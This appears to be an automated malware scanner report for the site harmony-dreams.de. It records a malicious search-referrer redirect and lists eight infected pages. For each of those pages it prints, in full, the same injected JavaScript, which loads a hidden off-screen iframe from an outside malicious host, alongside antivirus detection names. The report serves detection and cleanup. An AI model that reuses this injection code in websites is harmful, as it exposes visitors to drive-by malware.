Malware Scanner report for harmony-dreams.de

Malicious/Suspicious/Total urls checked: 8/0/12

8 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://www.couchtarts.com/media.php
1804 websites infected.

The website "harmony-dreams.de" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://harmony-dreams.de/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: harmony-dreams.de Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Sep 2015 00:44:18 GMT Location: http://www.couchtarts.com/media.php Server: Apache Content-Length: 243 Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://harmony-dreams.de/	200 OK Content-Length: 5101 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/layout/script.js	200 OK Content-Length: 1622 Content-Type: application/x-javascript	clean
http://m1.nedstatbasic.net/basic.js	200 OK Content-Length: 2963 Content-Type: text/javascript	clean
http://harmony-dreams.de/zucht.html	200 OK Content-Length: 13854 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/sale.html	200 OK Content-Length: 14490 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/kast.html	200 OK Content-Length: 13567 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/info.html	200 OK Content-Length: 5597 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/gal.html	200 OK Content-Length: 7153 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/kontakt.html	200 OK Content-Length: 4168 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/test404page.js	404 Not Found Content-Length: 619 Content-Type: text/html	clean
http://harmony-dreams.de/kaufer.html	200 OK Content-Length: 6169 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://harmony-dreams.de/info.pdf	200 OK Content-Length: 100833 Content-Type: application/pdf	clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=harmony-dreams.de

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://harmony-dreams.de/

Result: harmony-dreams.de is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for harmony-dreams.de

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools